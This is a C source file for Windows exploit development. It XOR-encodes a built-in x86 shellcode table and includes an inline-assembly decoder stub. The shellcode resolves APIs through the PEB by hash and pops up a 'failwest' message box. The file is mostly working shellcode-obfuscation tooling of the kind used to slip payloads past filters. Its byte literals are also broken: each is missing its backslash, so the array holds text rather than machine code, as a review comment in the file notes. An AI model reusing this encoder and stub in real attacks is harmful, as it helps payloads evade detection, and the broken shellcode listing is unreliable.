// Encoder.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
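/*
 * encoder: XOR each byte of `input` with the one-byte `key`, write the
 * result to "encode.txt" as C string-literal syntax ("\xNN\xNN...", 16
 * bytes per source line, terminated by ";"), and optionally echo the hex
 * bytes to stdout.
 *
 * input        NUL-terminated buffer. Its length is taken with strlen(),
 *              so a 0x00 byte inside the payload ends the output there;
 *              the interface has no length parameter, so callers with such
 *              a payload need a separate length-taking entry point.
 * key          XOR key. The decoder stub must use the same value.
 * display_flag non-zero also prints the encoded bytes to the screen.
 *
 * On allocation or file failure a message goes to stderr and the process
 * exits with a failure status (previously exit(0), which reported success
 * to the caller even when no file had been written).
 */
void encoder(const char *input, unsigned char key, int display_flag)
{
    size_t len = strlen(input);
    /* len + 1 keeps the request non-zero for an empty input */
    unsigned char *output = malloc(len + 1);
    if (!output) {
        fprintf(stderr, "memory erro!\n");
        exit(EXIT_FAILURE);
    }

    /* encode: the cast keeps the XOR on unsigned bytes regardless of char signedness */
    for (size_t i = 0; i < len; i++) {
        output[i] = (unsigned char)input[i] ^ key;
    }

    FILE *fp = fopen("encode.txt", "w+");
    if (!fp) {
        fprintf(stderr, "output file create erro");
        free(output);
        exit(EXIT_FAILURE);
    }

    fprintf(fp, "\""); /* opening double quote of the literal */
    for (size_t i = 0; i < len; i++) {
        fprintf(fp, "\\x%02x", output[i]);
        if ((i + 1) % 16 == 0) {
            /* close the quote, break the line, reopen it */
            fprintf(fp, "\"\n\"");
        }
    }
    fprintf(fp, "\";");

    /* fclose() flushes; a failed flush means the dump on disk is incomplete */
    if (fclose(fp) != 0) {
        fprintf(stderr, "output file write erro");
        free(output);
        exit(EXIT_FAILURE);
    }
    printf("dump the encoded shellcode to encode.txt OK!\n");

    if (display_flag) { /* print to screen */
        for (size_t i = 0; i < len; i++) {
            printf("%02x", output[i]);
            if ((i + 1) % 16 == 0) {
                printf("\n");
            }
        }
    }
    free(output);
}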
/*
 * decoder: in-memory counterpart of encoder(). MSVC x86 inline assembly
 * (does not build with other compilers) that XORs bytes back in place with
 * the same one-byte key until it meets a 0x90 byte. It is never called from
 * this file; the function exists so the assembled stub bytes can be taken
 * from the binary. The stub itself is plain code; only the bytes that
 * follow it are encoded.
 * NOTE(review): on entry eax is assumed to already hold the stub's own
 * address - nothing in this file sets it. The loop tests the *decoded*
 * byte, so a 0x90 anywhere inside the payload ends decoding early, and
 * there is no length bound other than that terminator.
 */
void decoder()
{
//================== decoder =================================================
__asm
{
add eax,0x14 //skip past this stub: eax + 0x14 is the start of the encoded bytes
xor ecx,ecx //ecx = 0, the byte index
decode_loop:
mov bl,byte ptr[eax+ecx] //load one encoded byte
xor bl,0x44 //0x44 is the key; if the key given to encoder() changes, change it here too
mov [eax+ecx],bl //write the decoded byte back in place
inc ecx
cmp bl,0x90 //a single 0x90 byte placed after the payload marks its end
jne decode_loop
}
//================== decoder END =============================================
}
/*
 * popup_general: the payload main() feeds to encoder(). It is a char array
 * so it can be passed as a C string, which is also why encoder() bounds it
 * with strlen(): the table must not contain a 0x00 byte.
 * NOTE(review): in this listing every literal reads "xNN" rather than
 * "\xNN"; as printed, the array holds ASCII text, not the bytes the
 * per-line comments describe - presumably the backslashes were lost when
 * the page was extracted. The trailing 0x90 terminator that decoder()
 * stops on is not part of this table either.
 */
char popup_general[]=
"xFC" //cld
"x68x6Ax0Ax38x1E" //push 1E380A6A
"x68x63x89xD1x4F" //push 4FD18963
"x68x32x74x91x0C" //push 0C917432
"x8BxF4" //mov esi,esp
"x8Dx7ExF4" //lea edi,dword ptr ds[esi-C]
"x33xDB" //xor ebx,ebx
"xB7x04" //mov bh,4
"x2BxE3" //sub esp,ebx
"x66xBBx33x32" //mov bx,3233
"x53" //push ebx
"x68x75x73x65x72" //push 72657375
"x54" //push esp
"x33xD2" //xor edx,edx
"x64x8Bx5Ax30" //mov ebx,dword ptr fs[edx+30]
"x8Bx4Bx0C" //mov ecx,dword ptr ds[ebx+C]
"x8Bx49x1C" //mov ecx,dword ptr ds[ecx+1C]
"x8Bx09" //mov ecx,dword ptr ds[ecx]
"x8Bx69x08" //mov ebp,dword ptr ds[ecx+8]
"xAD" //lods dword ptr ds[esi]
"x3Dx6Ax0Ax38x1E" //cmp eax,1E380A6A
"x75x05" //jnz short shellcod.0040D48C
"x95" //xchg eax,ebp
"xFFx57xF8" //call dword ptr ds[edi-8]
"x95" //xchg eax,ebp
"x60" //pushad
"x8Bx45x3C" //mov eax,[arg.14]
"x8Bx4Cx05x78" //mov ecx,dword ptr ss[ebp+eax+78]
"x03xCD" //add ecx,ebp
"x8Bx59x20" //mov ebx,dword ptr ds[ecx+20]
"x03xDD" //add ebx,ebp
"x33xFF" //xor edi,edi
"x47" ///inc edi
"x8Bx34xBB" //|mov esi,dword ptr ds[ebx+edi*4]
"x03xF5" //|add esi,ebp
"x99" //|cdq
"x0FxBEx06" //|/movsx eax,byte ptr ds[esi]
"x3AxC4" //||cmp al,ah
"x74x08" //||je short shellcod.0040D4B3
"xC1xCAx07" //||ror edx,7
"x03xD0" //||add edx,eax
"x46" //||inc esi
"xEBxF1" //|jmp short shellcod.0040D4A4
"x3Bx54x24x1C" //|cmp edx,dword ptr ss[esp+1C]
"x75xE4" //jnz short shellcod.0040D49D
"x8Bx59x24" //mov ebx,dword ptr ds[ecx+24]
"x03xDD" //add ebx,ebp
"x66x8Bx3Cx7B" //mov di,word ptr ds[ebx+edi*2]
"x8Bx59x1C" //mov ebx,dword ptr ds[ecx+1C]
"x03xDD" //add ebx,ebp
"x03x2CxBB" //add ebp,dword ptr ds[ebx+edi*4]
"x95" //xchg eax,ebp
"x5F" //pop edi
"xAB" //stos dword ptr es[edi]
"x57" //push edi
"x61" //popad
"x3Dx6Ax0Ax38x1E" //cmp eax,1E380A6A
"x75xA9" //jnz short shellcod.0040D47F
"x33xDB" //xor ebx,ebx
"x53" //push ebx
"x68x77x65x73x74" //push 74736577
"x68x66x61x69x6C" //push 6C696166
"x8BxC4" //mov eax,esp
"x53" //push ebx
"x50" //push eax
"x50" //push eax
"x53" //push ebx
"xFFx57xFC" //call dword ptr ds[edi-4]
"x53" //push ebx
"xFFx57xF8"; //call dword ptr ds[edi-8] //nop
/* Entry point: encode the built-in popup_general table with key 0x44 and
 * echo the encoded bytes to the screen. The command line is ignored. */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    encoder(popup_general, 0x44, 1);
    return 0;
}